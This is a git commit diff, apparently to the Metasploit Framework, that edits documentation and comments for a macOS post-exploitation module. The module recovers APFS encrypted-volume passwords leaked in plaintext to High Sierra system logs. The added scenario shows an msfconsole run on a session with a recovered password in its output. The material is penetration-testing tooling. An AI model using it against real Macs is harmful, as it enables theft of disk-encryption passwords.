minor documentation and comment tweaks

2018-04-18 14:22:32 +08:00 · 2018-04-18 14:22:32 +08:00 · 72cd97d3e4
parent f54df6aa46
commit 72cd97d3e4
2 changed files with 20 additions and 5 deletions
--- a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md
+++ b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md
@ -25,3 +25,19 @@ This module uses a vulnerability in macOS High Sierra's `log` command. It uses t
  **MOUNT_PATH**

  `MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`
+
+## Scenarios
+
+  Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
+
+```
+msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
+SESSION => -1
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
+
+[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
+[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
+[*] Post module execution completed
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
+```
--- a/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
+++ b/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
@ -10,13 +10,16 @@ class MetasploitModule < Msf::Post
      'Description'   => %q(
        This module exploits a flaw in OSX 10.13 through 10.13.3
        that discloses the passwords of encrypted APFS volumes.
+
+        In OSX a normal user can use the 'log' command to view the system
+        logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
+        volume the password is visible in plaintext within these logs.
      ),
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
          [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
-
        ],
      'Platform'      => 'osx',
      'Arch'          => ARCH_ALL,
@ -38,10 +41,6 @@ class MetasploitModule < Msf::Post
  end

  def check
-    # sw_vers looks like this:
-    # ProductName: macOS
-    # ProductVersion: 10.12
-    # BuildVersion: 7A100
    osx_version = cmd_exec('sw_vers -productVersion')
    return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[\.[0-3]]?$/
    Exploit::CheckCode::Safe